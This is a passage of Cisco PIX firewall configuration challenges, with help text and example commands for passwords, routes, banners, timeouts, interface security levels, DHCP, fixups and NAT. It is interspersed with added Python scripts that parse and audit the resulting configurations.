                The relative security level between two interfaces determines
                the way the Adaptive Security Algorithm is applied.
                A lower security_level interface is outside relative to a higher
                level interface and equivalent interfaces are outside to each
                other.
see also:
nameif
(config-if)# security-level 50
(config-if)# exit
(config)# help username
USAGE:
username <username> {nopassword|password <password>
[encrypted]} [privilege <level>]
no username <name>
[no] username <name> attributes
clear configure username [<name>]
show running-config [all] username [<name> [attributes]]
DESCRIPTION:
username        Configure user authentication local database
SYNTAX:
<username>      The name of the user. A minimum of 4 characters is required.
                A maximum of 64 characters is allowed.
<nopassword>    Indicates that this user has no password
<password>      The password for this user
encrypted       Indicate the <password> entered is encrypted
<level>         The privilege level for this user
attributes      Enter the attributes sub-command mode
(config)# username fred password bert
(config)# exit
# show running
# show running user

Cisco PIX Challenge 4


Outline
This challenge involves the configuration of basic PIX details.
Objectives
The objectives of this challenge are to:

Define a hostname and passwords.
Enable the HTTP server.
Define a MOTD banner.

Example (Ver 6.x)


> enable
# nameif
# config t
(config)# hostname mars
(config)# help enable
USAGE:
enable password [<pw>] [level <level>] [encrypted]
no enable password level <level>
show running-config enable
DESCRIPTION:
enable          Configure enable passwords
SYNTAX:
<pw>            The password for this privilege level
<level>         The privilege level
<encrypted>     Indicates that this password is encrypted
(config)# enable ?
configure mode commands/options:
password Configure password for the enable command
(config)# enable password ?
configure mode commands/options:
WORD Enter a password for the privilege level
<cr>
(config)# enable password kirk
(config)# password ?
configure mode commands/options:
WORD A password of up to 16 alphanumeric characters
(config)# passwd kent
(config)# help password
USAGE:
[no] password|passwd <password> encrypted
clear configure passwd
DESCRIPTION:
passwd          Change Telnet console access password
SYNTAX:
<password>      A password of up to 16 alphanumeric characters
                Factory-default password is cisco
encrypted       Indicate the <password> entered is encrypted
see also:
telnet
(config)# help http
USAGE:
[no] http <local_ip> <mask> <if_name>
[no] http server enable
DESCRIPTION:
http            Configure HTTP server
SYNTAX:
<local_ip>      The ip address of the host and/or network authorized to
                access the device HTTP server.
<mask>          The IP netmask to apply to <local_ip>.
                Default is 255.255.255.255.
<if_name>       Network interface name.
see also:
password, aaa
(config)# http server enable
(config)# help banner
USAGE:
banner {exec | login | motd} <text>
no banner {exec | login | motd} [<text>]
show banner [{exec | login | motd}]
clear banner
DESCRIPTION:
banner          Configure login/session banners
SYNTAX:
exec            Configures the system to display a banner before the enable prompt
                is displayed.
login           Configures the system to display a banner before the password login
                prompt when accessing the device using telnet.
motd            Configures the system to display a message-of-the-day banner.
<text>          A line of the message to be displayed. It will be added to the end
                of an existing banner. The tokens $(domain) and $(hostname) will be
                replaced with the host name and domain name.
(config)# banner motd hello
(config)# show banner
# show banner

Example (Ver 7.x)


As for Version 6.x, but use show running banner instead of show banner.

Cisco PIX Challenge 5


Outline
This challenge involves the configuration of a static route, and some banners.
Objectives
The objectives of this challenge are to:

Define a static route.
Define banners.

Example
(config)# help route
USAGE:
[no] route <if_name> <foreign_ip> <mask> <gateway>
[<metric>|tunneled]
clear configure route [<if_name>]
clear route [<if_name>]
show running-config route
show route [<if_name>]
DESCRIPTION:
route           Enter a static route for an interface
SYNTAX:
<if_name>       The interface name, as specified by the 'nameif' command,
                for which the route will apply
<foreign_ip>    The foreign network for this route, 0 means default
<mask>          The netmask for the destined foreign network <foreign_ip>
<gateway>       The address of the gateway by which <foreign_ip> is reached
<metric>        Distance metric for this route, default is 1
tunneled        Specifies route as the default tunnel gateway for VPN traffic.
see also:
rip, ping

(config)# route inside 10.0.0.0 ?
configure mode commands/options:
A.B.C.D The netmask for the destined foreign network
(config)# route inside 10.0.0.0 255.255.0.0 ?
configure mode commands/options:
Hostname or A.B.C.D The address of the gateway by which the foreign network
is reached.
(config)# route inside 10.0.0.0 255.255.0.0 206.59.124.10 ?
configure mode commands/options:
<1-255>
Distance metric for this route, default is 1
tunneled Enable the default tunnel gateway option, metric is set
to 255
(config)# route outside 10.0.0.0 255.255.0.0 206.59.124.10
(config)# show route
(config)# banner motd admin device
(config)# banner login personal device
(config)# banner exec main device
(config)# show domain-name
(config)# domain-name dumfries.eu
(config)# exit
# show route
S    10.0.0.0 255.255.0.0 [1/0] via 206.59.124.10, inside
C    192.168.0.1 255.255.255.0 is directly connected, glasgow
C    192.168.1.1 255.255.255.0 is directly connected, inside
C    192.168.2.1 255.255.255.0 is directly connected, dmz
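When auditing a firewall it is useful to have the show route table in a form that can be queried ("which interface does traffic to this host leave through?"). The parser below is an added example, not code from NetworkSims; it reads the two line shapes the output above uses (static routes with [distance/metric] via a gateway, and directly connected networks) and answers lookups by longest prefix match. The sample text is the page's own four lines, embedded here as a constructed input.

```python
"""Parser and longest-prefix lookup for PIX 'show route' output.
Added example; not code from the page."""
import ipaddress
import re

# Constructed sample: the page's own 'show route' lines, one route per line.
SAMPLE_SHOW_ROUTE = """\
S    10.0.0.0 255.255.0.0 [1/0] via 206.59.124.10, inside
C    192.168.0.1 255.255.255.0 is directly connected, glasgow
C    192.168.1.1 255.255.255.0 is directly connected, inside
C    192.168.2.1 255.255.255.0 is directly connected, dmz
"""

_STATIC = re.compile(
    r"^(?P<code>S)\s+(?P<net>\S+)\s+(?P<mask>\S+)\s+"
    r"\[(?P<ad>\d+)/(?P<metric>\d+)\]\s+via\s+(?P<gw>\S+),\s+(?P<ifc>\S+)$")
_CONNECTED = re.compile(
    r"^(?P<code>C)\s+(?P<net>\S+)\s+(?P<mask>\S+)\s+is directly connected,\s+(?P<ifc>\S+)$")


def parse_show_route(text: str) -> list[dict]:
    """Turn each route line into a dict with a normalised network object."""
    routes = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _STATIC.match(line) or _CONNECTED.match(line)
        if not m:
            raise ValueError(f"unrecognised route line: {line!r}")
        d = m.groupdict()
        # strict=False: a connected entry shows the interface address
        # (192.168.0.1/24); normalise it to its network (192.168.0.0/24).
        net = ipaddress.ip_network(f"{d['net']}/{d['mask']}", strict=False)
        routes.append({
            "code": d["code"],
            "network": net,
            "interface": d["ifc"],
            "gateway": ipaddress.ip_address(d["gw"]) if d.get("gw") else None,
            "admin_distance": int(d["ad"]) if d.get("ad") else 0,
            "metric": int(d["metric"]) if d.get("metric") else 0,
        })
    return routes


def lookup(routes: list[dict], dst: str):
    """Longest-prefix match for dst; returns the route dict or None."""
    addr = ipaddress.ip_address(dst)
    candidates = [r for r in routes if addr in r["network"]]
    return max(candidates, key=lambda r: r["network"].prefixlen, default=None)


if __name__ == "__main__":
    table = parse_show_route(SAMPLE_SHOW_ROUTE)
    for dst in ("10.0.5.9", "192.168.2.77", "8.8.8.8"):
        r = lookup(table, dst)
        print(dst, "->", (r["interface"], str(r["gateway"])) if r else "no route")
```

Note that the static route above lands on the inside interface even though the example typed route outside; a parsed table makes that kind of mismatch between intent and installed state easy to spot.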

Cisco PIX Challenge 6


Outline
This challenge involves the configuration of Telnet, SSH and Console timeouts.
Objectives
The objectives of this challenge are to:

Setup the hostname.
Define the domain name.
Define the Telnet timeout.
Define the SSH timeout.
Define the Console timeout.

Example
myPIX (config)# hostname arizona
arizona (config)# domain-name fife.nu
arizona (config)# show domain-name
myPIX (config)# help telnet
USAGE:
[no] telnet <local_ip> <mask> <if_name>
telnet timeout <number>
no telnet timeout [<number>]
DESCRIPTION:
telnet          Add telnet access to device console and set idle timeout
SYNTAX:
<local_ip>      The ip address of the host and/or network authorized to
                login to the device
<mask>          The IP netmask to apply to <local_ip>.
<if_name>       Network interface name.
<number>        Idle time in minutes after which a telnet session will be closed.
                Default is 5 minutes.
see also:
ssh, password, aaa
arizona (config)# telnet timeout 8
arizona (config)# help ssh
USAGE:
[no] ssh <local_ip> <mask> <if_name>
[no] ssh timeout <number>
[no] ssh version 1|2
[no] ssh scopy enable
show ssh sessions [<client_ip>]
ssh disconnect <session_id>
DESCRIPTION:
ssh             Add SSH access to the Device console, set idle timeout, set
                version supported, enable Secure Copy as an SSH application,
                display a list of active SSH sessions, and terminate an SSH
                session.
SYNTAX:
<local_ip>      The IP address of the host and/or network authorized to
                login to the Device.
<mask>          The IP netmask to apply to <local_ip>.
<if_name>       Network interface name.
<number>        Idle time in minutes after which a SSH session will be closed.
<client_ip>     The IP address of the SSH client.
<session_id>    Session ID as displayed by the 'show ssh sessions' command.
see also:
telnet, password, enable, aaa
arizona (config)# ssh timeout 9
pixfirewall(config)# help console
USAGE:
[no] console timeout <number>
DESCRIPTION:
console         Set idle timeout for the serial console of the PIX
SYNTAX:
<number>        Valid range <0-60>. For <1..60>, console session will be
                closed after idle time of <1..60> minutes. console
                will never close for timeout <0>
see also:
telnet, ssh, passwd, aaa
arizona (config)# console timeout 9
arizona (config)# show telnet
arizona (config)# show ssh
arizona (config)# show console
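The http, telnet and ssh commands in Challenges 4 and 6 all take the same <local_ip> <mask> <if_name> form to restrict who may reach the management plane, and each has an idle timeout. The script below, an added example and not code from NetworkSims, parses such lines from a running configuration, answers "is this source on this interface allowed to use this service?", and lists the settings a reviewer would question using the facts from the help text (console timeout 0 never closes, telnet defaults to 5 minutes). The running-config excerpt and the /24 "wide range" threshold are constructed for the demonstration.

```python
"""Audit of PIX management-plane access lines (http, telnet, ssh) and idle
timeouts. Added example; not code from the page."""
import ipaddress

# Constructed running-config excerpt using the syntax from the help output.
SAMPLE_CONFIG = """\
hostname arizona
domain-name fife.nu
http server enable
http 192.168.1.0 255.255.255.0 inside
telnet 192.168.1.10 255.255.255.255 inside
telnet timeout 8
ssh 192.168.1.0 255.255.255.0 inside
ssh 10.0.0.0 255.0.0.0 outside
ssh timeout 9
console timeout 0
"""

SERVICES = ("http", "telnet", "ssh")


def parse_management_config(text: str) -> dict:
    """Return {'allow': {svc: [(network, if_name), ...]},
               'timeout': {svc_or_console: minutes}, 'http_server': bool}."""
    cfg = {"allow": {s: [] for s in SERVICES}, "timeout": {}, "http_server": False}
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 2:
            continue
        cmd = parts[0]
        if cmd == "http" and parts[1:] == ["server", "enable"]:
            cfg["http_server"] = True
        elif cmd in SERVICES + ("console",) and parts[1] == "timeout" and len(parts) == 3:
            cfg["timeout"][cmd] = int(parts[2])
        elif cmd in SERVICES and len(parts) == 4:
            # '<svc> <local_ip> <mask> <if_name>': one permitted source range
            net = ipaddress.ip_network(f"{parts[1]}/{parts[2]}", strict=False)
            cfg["allow"][cmd].append((net, parts[3]))
    return cfg


def permitted(cfg: dict, service: str, src_ip: str, if_name: str) -> bool:
    """True if src_ip arriving on if_name matches an access line for the
    service. HTTP additionally needs 'http server enable'."""
    if service == "http" and not cfg["http_server"]:
        return False
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net and ifc == if_name for net, ifc in cfg["allow"][service])


def timeout_findings(cfg: dict) -> list[str]:
    """Points a reviewer would raise, based on the help-text semantics."""
    findings = []
    if cfg["timeout"].get("console") == 0:
        findings.append("console timeout 0: idle serial sessions are never closed")
    if "telnet" not in cfg["timeout"] and cfg["allow"]["telnet"]:
        findings.append("telnet timeout not set: default of 5 minutes applies")
    if cfg["allow"]["telnet"]:
        findings.append("telnet access configured: cleartext management protocol in use")
    for net, ifc in cfg["allow"]["ssh"] + cfg["allow"]["http"]:
        if net.prefixlen < 24:   # constructed threshold for 'wide' source ranges
            findings.append(f"wide management source range {net} on {ifc}")
    return findings


if __name__ == "__main__":
    cfg = parse_management_config(SAMPLE_CONFIG)
    print("ssh from 192.168.1.50 on inside :", permitted(cfg, "ssh", "192.168.1.50", "inside"))
    print("ssh from 192.168.1.50 on outside:", permitted(cfg, "ssh", "192.168.1.50", "outside"))
    for f in timeout_findings(cfg):
        print("-", f)
```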

Cisco PIX Challenge 7


Outline
This challenge involves the configuration of the security levels on the interfaces.
Objectives
The objectives of this challenge are to:

Rename the interfaces, and define the security level on each interface.

Note: A port with the name of outside always has a security level of 0, while a port with the
name of inside always has a security level of 100.

Example (Ver 6.x)


myPIX (config)# nameif e0 strathclyde security24
myPIX (config)# nameif e1 orkney security61
myPIX (config)# nameif e2 rhodeisland security44

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif strathclyde
(config-if)# security-level 24
(config-if)# exit
(config)# int e1
(config-if)# nameif orkney
(config-if)# security-level 61
(config-if)# exit
(config)# int e2
(config-if)# nameif rhodeisland
(config-if)# security-level 44
(config-if)# exit
(config)# exit
# show running
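The security-level help text in Challenge 3 and the note above together define how interfaces relate: a lower-level interface is outside relative to a higher one, equal levels are outside to each other, and the names inside and outside imply 100 and 0. The model below is an added example, not code from NetworkSims. It encodes that relationship for the interface names and levels of this challenge and adds the default-policy consequence, which is standard PIX/ASA behaviour rather than something the page states: connections initiated from a higher level to a lower one pass without an access list, the reverse direction does not, and equal levels need same-security-traffic permit inter-interface. The audit_levels helper is constructed for the demonstration.

```python
"""Model of PIX interface security-level relationships.
Added example; not code from the page."""

# The Ver 7.x example's interfaces and levels (constructed table).
INTERFACES = {"strathclyde": 24, "orkney": 61, "rhodeisland": 44}


def security_level(name: str, table: dict = INTERFACES) -> int:
    """Configured level, with the page's note applied: an interface named
    'outside' is always 0 and one named 'inside' is always 100."""
    if name == "outside":
        return 0
    if name == "inside":
        return 100
    if name in table:
        return table[name]
    raise KeyError(f"unknown interface {name!r}")


def relation(src: str, dst: str, table: dict = INTERFACES) -> str:
    """'outbound' from a higher to a lower level, 'inbound' from lower to
    higher, 'same' when the levels are equal (outside to each other)."""
    a, b = security_level(src, table), security_level(dst, table)
    if a > b:
        return "outbound"
    if a < b:
        return "inbound"
    return "same"


def allowed_by_default(src: str, dst: str, table: dict = INTERFACES,
                       same_security_inter_interface: bool = False) -> bool:
    """Whether a new connection from src to dst passes with no access-list
    applied (assumed standard PIX/ASA default policy, not from the page)."""
    r = relation(src, dst, table)
    if r == "outbound":
        return True
    if r == "same":
        return same_security_inter_interface
    return False


def audit_levels(table: dict) -> list[str]:
    """Reviewer's checks (constructed): duplicate levels, and interfaces at
    the extremes 0/100 that are not literally named outside/inside."""
    notes, seen = [], {}
    for name, lvl in table.items():
        if lvl in seen:
            notes.append(f"{name} and {seen[lvl]} share level {lvl}: outside to each other")
        seen.setdefault(lvl, name)
        if lvl == 100 and name != "inside":
            notes.append(f"{name} is at 100 (most trusted) but not named inside")
        if lvl == 0 and name != "outside":
            notes.append(f"{name} is at 0 (least trusted) but not named outside")
    return notes


if __name__ == "__main__":
    for src, dst in (("orkney", "strathclyde"), ("strathclyde", "orkney"),
                     ("rhodeisland", "orkney")):
        print(f"{src} -> {dst}: {relation(src, dst)}, "
              f"default allow = {allowed_by_default(src, dst)}")
    for note in audit_levels({"gretna": 0, "alabama": 100, "uranus": 50}):
        print("-", note)
```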

Cisco PIX Challenge 8


Outline
This challenge involves the configuration of a shutdown on the interfaces.
Objectives
The objectives of this challenge are to:

Define the names of the interfaces.
Shutdown each of the interfaces.

Example (6.x)
myPIX (config)# nameif e0 gretna security0
myPIX (config)# nameif e1 alabama security100
myPIX (config)# nameif e2 uranus security50
myPIX (config)# show nameif
myPIX (config)# interface e0 auto shut
myPIX (config)# interface e1 auto shut
myPIX (config)# interface e2 auto shut
myPIX (config)# show int
myPIX (config)# show int e0
myPIX (config)# show int e1
myPIX (config)# show int e2

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif gretna
(config-if)# security-level 0
(config-if)# shutdown
(config-if)# exit
(config)# int e1
(config-if)# nameif alabama
(config-if)# security-level 100
(config-if)# shutdown
(config-if)# exit
(config)# int e2
(config-if)# nameif uranus
(config-if)# security-level 50
(config-if)# shutdown
(config-if)# exit
(config)# exit
# show running

Cisco PIX Challenge 9


Outline
This challenge involves the configuration of interfaces.
Objectives
The objectives of this challenge are to:

Define the names of the interfaces.
Define the basic operation of the interfaces.

Example (Ver 6.x)


myPIX (config)# nameif e0 hawaii security0
myPIX (config)# nameif e1 alberta security100
myPIX (config)# nameif e2 orkney security50
myPIX (config)# interface e0 100full
myPIX (config)# interface e1 100full
myPIX (config)# interface e2 100full

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# help interface
USAGE:
interface <type> <port>
interface <type> <port>.<subif_number>
no interface <type> <port>.<subif_number>
show running-config [default] interface {<type> <port>[.<subif_number>]}
show interface {<type> <port>[.<subif_number>] | <if_name>}
[detail|stats|ip brief]
clear config interface {<type> <port>[.<subif_number>]}
clear interface {<type> <port>[.<subif_number>]}
DESCRIPTION:
interface       Set network interface parameters
                show/clear interface counters
                show brief summary of IP status and configuration
SYNTAX:
<type>          Type of interface to be configured
                Possible values: Ethernet, GigabitEthernet
<port>          Port number. Refer to the appropriate hardware manual for
                port information
<subif_number>  Subinterface number in the range 1 to 4,294,967,293
<if_name>       Interface name assigned by 'nameif' command

WARNING! Using 'no' on a Subinterface will remove the interface
from the system. Removing a Subinterface will delete all
configuration rules applied to the interface. Exercise caution when
using the 'no interface' command.
see also:
allocate-interface

(config)# int e0
(config-if)# nameif gretna
(config-if)# security-level 0
(config-if)# help du
USAGE:
duplex auto|full|half
no duplex [auto|full|half]
DESCRIPTION:
duplex          Configure duplex operation
SYNTAX:
auto            Enable AUTO duplex configuration
full            Force full duplex operation
half            Force half-duplex operation
see also:
speed
(config-if)# duplex full
(config-if)# help speed
USAGE:
speed 10|100|1000|auto
no speed [10|100|1000|auto]
DESCRIPTION:
speed           Configure speed operation
SYNTAX:
Possible Ethernet values are:
10              Force 10 Mbps operation
100             Force 100 Mbps operation
auto            Enable AUTO speed configuration
Possible GigabitEthernet values are:
10              Force 10 Mbps operation
100             Force 100 Mbps operation
1000            Force 1000 Mbps operation
auto            Enable AUTO speed configuration
see also:
duplex
(config-if)# speed 100
(config-if)# exit
(config)# int e1
(config-if)# nameif alabama
(config-if)# security-level 100
(config-if)# duplex full
(config-if)# speed 100
(config-if)# exit
(config)# int e2
(config-if)# nameif uranus
(config-if)# security-level 50
(config-if)# duplex full
(config-if)# speed 100
(config-if)# exit
(config)# exit
# show running

Cisco PIX Challenge 10


Outline
This challenge involves the configuration of the DHCP server.
Objectives
The objectives of this challenge are to:

Enable the DHCP server.
Define DHCP parameters.
Show DHCP parameters.

Commands
myPIX (config)# dhcpd enable inside
myPIX (config)# dhcpd dns 197.174.60.1
myPIX (config)# dhcpd address 197.174.60.2-197.174.60.22 inside
myPIX (config)# dhcpd wins 195.94.110.3
myPIX (config)# dhcpd lease 6
myPIX (config)# dhcpd domain athome.com
myPIX (config)# show dhcpd

Example
myPIX (config)# help dhcpd
USAGE:
dhcpd address <ip1>[-<ip2>] <srv_ifc_name>
dhcpd dns <dnsip1> [<dnsip2>]
dhcpd wins <winsip1> [<winsip2>]
dhcpd lease <lease_length>
dhcpd ping_timeout <timeout>
dhcpd domain <domain_name>
dhcpd option <code> {ascii <string> | hex <hex_string> |
ip <address_1> [<address_2>]}
dhcpd enable <srv_ifc_name>
dhcpd auto_config <clnt_if_name>
show dhcpd [binding|statistics]
clear dhcpd
clear dhcpd [binding|statistics]
DESCRIPTION:
dhcpd           Configure DHCP Server
SYNTAX:
<ip1>           Start address of the DHCP address pool
<ip2>           End address of the DHCP address pool
<dnsip>         DNS server IP address
<winsip>        NetBios name server IP address
<lease_length>  DHCP lease length in seconds
<timeout>       Ping timeout in milliseconds
<domain_name>   DNS domain name
<code>          positive number representing the DHCP option code
<string>        ASCII string without whitespace
<hex_string>    hexadecimal string without whitespace
<address_1>     IP address
<address_2>     IP address
<srv_ifc_name>  Interface to enable DHCP server
<clnt_if_name>  Interface to retrieve DHCP client info
myPIX (config)# dhcpd enable inside
myPIX (config)# dhcpd address 197.174.60.2-197.174.60.22 inside
myPIX (config)# dhcpd wins 195.94.110.3
myPIX (config)# dhcpd lease 6
myPIX (config)# dhcpd domain athome.com
myPIX (config)# show dhcpd
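The help text above fixes the meaning of each dhcpd argument (the pool is a start-end range per interface, the lease is in seconds). The reader below, an added example and not code from NetworkSims, parses the challenge's own dhcpd commands into a structure, computes the pool size, and applies a few consistency checks: a pool on an interface where the server is not enabled (and vice versa), a pool whose end precedes its start, no DNS server offered, and a very short lease. The 60-second lease threshold is a constructed review value, not a PIX limit.

```python
"""Reader and consistency checks for PIX 'dhcpd' commands.
Added example; not code from the page."""
import ipaddress

# Constructed sample: the page's commands without their prompts.
SAMPLE = """\
dhcpd enable inside
dhcpd dns 197.174.60.1
dhcpd address 197.174.60.2-197.174.60.22 inside
dhcpd wins 195.94.110.3
dhcpd lease 6
dhcpd domain athome.com
"""


def parse_dhcpd(text: str) -> dict:
    cfg = {"enabled_on": set(), "pools": {}, "dns": [], "wins": [],
           "lease": None, "domain": None}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] != "dhcpd":
            continue
        key, args = parts[1], parts[2:]
        if key == "enable":
            cfg["enabled_on"].add(args[0])
        elif key == "address":
            # '<ip1>[-<ip2>] <srv_ifc_name>': a single address if no '-'
            first, _, last = args[0].partition("-")
            cfg["pools"][args[1]] = (ipaddress.ip_address(first),
                                     ipaddress.ip_address(last or first))
        elif key in ("dns", "wins"):
            cfg[key] = [ipaddress.ip_address(a) for a in args]
        elif key == "lease":
            cfg["lease"] = int(args[0])   # seconds, per the help text
        elif key == "domain":
            cfg["domain"] = args[0]
    return cfg


def pool_size(cfg: dict, if_name: str) -> int:
    """Number of addresses in the pool configured for if_name."""
    first, last = cfg["pools"][if_name]
    return int(last) - int(first) + 1


def findings(cfg: dict) -> list[str]:
    out = []
    for ifc in sorted(cfg["enabled_on"]):
        if ifc not in cfg["pools"]:
            out.append(f"dhcpd enabled on {ifc} but no address pool for it")
    for ifc, (first, last) in cfg["pools"].items():
        if last < first:
            out.append(f"pool on {ifc} ends before it starts")
        if ifc not in cfg["enabled_on"]:
            out.append(f"pool on {ifc} but dhcpd not enabled there")
    if cfg["lease"] is not None and cfg["lease"] < 60:   # constructed threshold
        out.append(f"lease of {cfg['lease']} seconds: clients renew almost continuously")
    if not cfg["dns"]:
        out.append("no DNS server handed out")
    return out


if __name__ == "__main__":
    cfg = parse_dhcpd(SAMPLE)
    print("pool on inside:", pool_size(cfg, "inside"), "addresses")
    for f in findings(cfg):
        print("-", f)
```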

Cisco PIX Challenge 11


Outline
This challenge involves the configuration of fixups.
Objectives
The objectives of this challenge are to:

Define fixup protocols.
Show fixup protocols.

Example (V6.x)
myPIX (config)# help fixup
USAGE:
[no] fixup protocol <prot> [<option>] <port>[-<port>]
DESCRIPTION:
fixup           Add or delete inspection service and feature defaults
SYNTAX:
<prot>          Protocol fixup to be enabled or disabled:
                ctiqbe, dns [maximum-length <length>], ftp [strict], h323,
                http, icmp [error], ils, mgcp, netbios, pptp, rsh, rtsp, sip,
                skinny, smtp, snmp, sqlnet, sunrpc, sunrpc_udp, tftp, xdmcp
                The fixup can be disabled via the no form of the command, e.g.,
                no fixup protocol ftp strict 21
<option>        option to the inspection function
<port1>[-<port2>]  A range of ports to enable the fixup
myPIX (config)# fixup protocol ?
configure mode commands/options:
ctiqbe
dns
ftp
h323
http
icmp
ils
mgcp
netbios
pptp
rsh
rtsp
sip
skinny
smtp
snmp
sqlnet
sunrpc
sunrpc_udp
tftp
xdmcp
myPIX (config)# fix pro http ?
configure mode commands/options:
WORD   Specify port(s) to enable fixup, <port1>[-<port2>]; default port(s):
       ctiqbe--------------2748 ftp-------------------21
       gtp------------2123,3386 h323-h225-----------1720
       h323-ras-------1718-1719 http------------------80
       ils------------------389 mgcp-----------2427,2727
       netbios----------137-138 pptp----------------1723
       rsh------------------514 rtsp-----------------554
       sip-----------------5060 skinny--------------2000
       smtp------------------25 snmp-----------------161
       sqlnet--------------1521 sunrpc---------------111
       sunrpc_udp-----------111 tftp------------------69
       xdmcp----------------177
highs  Ports 1024-65535
lows   Ports 1-1023
udp    Enable SIP over UDP application inspection
myPIX (config)# fixup protocol http 161
myPIX (config)# fixup protocol ftp 60
myPIX (config)# fixup protocol smtp 84
myPIX (config)# show fixup

Example (V7.x)
As V6.x but replace show fixup with:
myPIX # sh run fix
INFO: All 'fixup' commands have been converted to 'inspect' commands.
Please use 'show running-config service-policy' in conjunction
with 'show running-config policy-map' to view the new configuration.
myPIX # sh run service-p
service-policy global_policy global
myPIX # sh run policy-m
!
policy-map global_policy
class inspection_default
inspect dns maximum-length 512
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
inspect http
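The default-port table printed by fix pro http ? is the reference for deciding whether a fixup line is doing what its author expects. The checker below is an added example, not code from NetworkSims; its DEFAULT_PORTS table is transcribed from that help output, and it flags a fixup bound to a port that is the default of a different protocol (as fixup protocol http 161 does with SNMP's port) or to a non-default port. The protocol-name prefix matching (so that h323 covers the h323-h225 and h323-ras rows) and the sample command list are constructed for the demonstration.

```python
"""Checker for 'fixup protocol <prot> [<option>] <port>[-<port>]' lines
against the PIX default-port table. Added example; not code from the page."""

# Transcribed from the 'fix pro http ?' help output above.
DEFAULT_PORTS = {
    "ctiqbe": [2748], "ftp": [21], "gtp": [2123, 3386], "h323-h225": [1720],
    "h323-ras": [1718, 1719], "http": [80], "ils": [389],
    "mgcp": [2427, 2727], "netbios": [137, 138], "pptp": [1723],
    "rsh": [514], "rtsp": [554], "sip": [5060], "skinny": [2000],
    "smtp": [25], "snmp": [161], "sqlnet": [1521], "sunrpc": [111],
    "sunrpc_udp": [111], "tftp": [69], "xdmcp": [177],
}

# Constructed sample: the page's three commands plus two default-port ones.
SAMPLE_FIXUPS = [
    "fixup protocol http 161",
    "fixup protocol ftp 60",
    "fixup protocol smtp 84",
    "fixup protocol ftp strict 21",
    "fixup protocol h323 1720",
]


def parse_fixup(line: str):
    """Return (protocol, option_or_None, (low, high)) or None for other lines."""
    parts = line.split()
    if len(parts) < 4 or parts[:2] != ["fixup", "protocol"]:
        return None
    prot, ports = parts[2], parts[-1]
    option = " ".join(parts[3:-1]) or None
    low, _, high = ports.partition("-")
    lo = int(low)
    hi = int(high) if high else lo
    return prot, option, (lo, hi)


def defaults_for(prot: str) -> list[int]:
    """Default ports for a protocol; 'h323' also gathers the h323-* rows
    (constructed prefix rule)."""
    ports = []
    for name, p in DEFAULT_PORTS.items():
        if name == prot or name.startswith(prot + "-"):
            ports.extend(p)
    return ports


def owners_of(port: int) -> list[str]:
    """Protocols for which `port` is a default."""
    return sorted(p for p, ports in DEFAULT_PORTS.items() if port in ports)


def review_fixups(lines) -> list[str]:
    findings = []
    for line in lines:
        parsed = parse_fixup(line)
        if parsed is None:
            continue
        prot, _option, (lo, hi) = parsed
        defaults = defaults_for(prot)
        if not defaults:
            findings.append(f"{line}: unknown protocol {prot}")
            continue
        for port in range(lo, hi + 1):
            if port in defaults:
                continue
            others = [o for o in owners_of(port) if o != prot]
            if others:
                findings.append(f"{line}: port {port} is the default for "
                                f"{', '.join(others)}, so {prot} inspection "
                                f"now applies to that traffic")
            else:
                findings.append(f"{line}: {prot} inspection on non-default port {port}")
    return findings


if __name__ == "__main__":
    for f in review_fixups(SAMPLE_FIXUPS):
        print("-", f)
```

On 7.x the same review applies to the inspect lines of the policy-map shown above, since the INFO message states that every fixup was converted to an inspect statement.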

Cisco PIX Challenge 12


Outline
This challenge involves the configuration of an encryption key.
Objectives
The objectives of this challenge are to:

Define the domain name.
Define a user and a password.
Create an RSA key.
Show the RSA key.

Example
myPIX (config)# domain-name fife.nu
myPIX (config)# username fred password bert
myPIX (config)# help ca
USAGE:
crypto ca trustpoint <name>
no crypto ca trustpoint <name> [noconfirm]
crypto ca authenticate <name> [fingerprint <hex value>] [nointeractive]
crypto ca enroll <name> [noconfirm]
crypto ca import <name> certificate [nointeractive]
crypto ca import <name> pkcs12 <passphrase> [nointeractive]
crypto ca export <name> pkcs12 <passphrase>
crypto ca crl request <name>
crypto ca certificate map <sequence #>
crypto ca certificate chain <name>
clear configure crypto ca trustpoint
clear configure ca certificate map [<sequence #>]
clear crypto ca crls [<name>]
show crypto ca crls [<name>]
show crypto ca certificates [<name>]
show running-config [all] crypto ca
DESCRIPTION:
ca              Configure the Certification Authority.
SYNTAX:
trustpoint      Define a CA trustpoint
authenticate    Get the CA certificate
enroll          Request a certificate from a CA
import          Import certificate or pkcs-12 data
export          Export a trustpoint configuration with all associated
                keys and certificates in PKCS12 format
crl             For manual CRL polling, displaying, and erasing.
certificate map Define certificate attributes map
certificate chain
                Enter certificate chain configuration mode for the
                indicated trustpoint
noconfirm       Suppress all interactive prompting
nointeractive   Execute the command in non-interactive mode
fingerprint     A key consisting of alphanumeric characters that is
                used to authenticate the CA's certificate.
<name>          A nickname for the CA server.
<passphrase>    A required password that gives the CA administrator
                some authentication when a user calls to ask for a
                certificate to be revoked.
                It can be up to 80 characters in length.
<sequence #>    Sequence to insert into certificate map entry
see also: key, crypto, ipsec, isakmp, tunnel-group
myPIX (config)# ca generate rsa key 256
myPIX (config)# show ca mypubkey rsa

Cisco PIX Challenge 13


Outline
This challenge involves the configuration of NAT.
Objectives
The objectives of this challenge are to:

Define inside address range.
Define outside address range.
Show NAT parameters.
Show Global parameters.

Example (Ver 6.x)


myPIX (config)# help nat
USAGE:
[no] nat (<if_name>) <nat_id> <local_ip> [<mask>]
[dns] [outside]
[[tcp] <max_conns> [<emb_limit> [<norandomseq>]]]
[udp <udp_max_conns>]
[no] nat (if_name) <nat_id> access-list <acl-name>
[dns] [outside]
[[tcp] <max_conns> [<emb_limit> [<norandomseq>]]]
[udp <udp_max_conns>]
DESCRIPTION:
nat             Associate a network with a pool of global IP addresses
SYNTAX:
<if_name>       The name of the network interface, as specified by 'nameif',
                where the hosts/network designated by <local_ip> are accessed.
<nat_id>        The id of this group of hosts or networks. This id will
                be referenced by the 'global' command to associate a global
                pool with this command. The id '0' is reserved to indicate
                (i) no address translation with the access-list option or
